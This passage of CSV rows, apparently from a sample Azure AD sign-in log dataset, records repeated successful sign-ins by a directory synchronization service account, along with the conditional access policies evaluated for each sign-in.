'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4445394f-bc55-4988-8502-680d74020b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4445394f-bc55-4988-8502-680d74020b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1782,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f00c2e23-e90e-4a22-b29b-b5dd75942de3,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4445394f-bc55-4988-8502-680d74020b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4445394f-bc55-4988-8502-680d74020b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1783,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7c3778ea-9924-47ad-84c0-7b31e90502c8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2dc92ee6-03c4-4d81-9c6d-29ffbd640900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2dc92ee6-03c4-4d81-9c6d-29ffbd640900,SigninLogs,Sucess,36.6404686,-78.26995087
+1784,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:58.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c0727fe1-a09d-4543-8c67-527d0daf4c4f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f4c49c86-cb9e-4a04-9dcc-1dcddfd70800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f4c49c86-cb9e-4a04-9dcc-1dcddfd70800,SigninLogs,Sucess,36.6404686,-78.26995087
+1785,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:58.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c0727fe1-a09d-4543-8c67-527d0daf4c4f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f4c49c86-cb9e-4a04-9dcc-1dcddfd70800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f4c49c86-cb9e-4a04-9dcc-1dcddfd70800,SigninLogs,Sucess,36.6404686,-78.26995087
+1786,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:06.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d9290350-4159-4ec3-8955-3d1c2de1d5d8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2dc92ee6-03c4-4d81-9c6d-29ffa6ea0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2dc92ee6-03c4-4d81-9c6d-29ffa6ea0900,SigninLogs,Sucess,36.6404686,-78.26995087
+1787,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d04ba9af-a0d6-41f7-8756-3bf3ffaad2cc,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",7ad10e9e-8b94-4b07-9307-1c32e6ed0a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7ad10e9e-8b94-4b07-9307-1c32e6ed0a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1788,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aee4b22a-5094-4c60-b4aa-ba0cafb19143,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",22fd8c7c-75eb-4549-80fa-1727e21e0b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-1727e21e0b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1789,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:54.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e27c471c-add5-4618-ae25-113939313247,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': 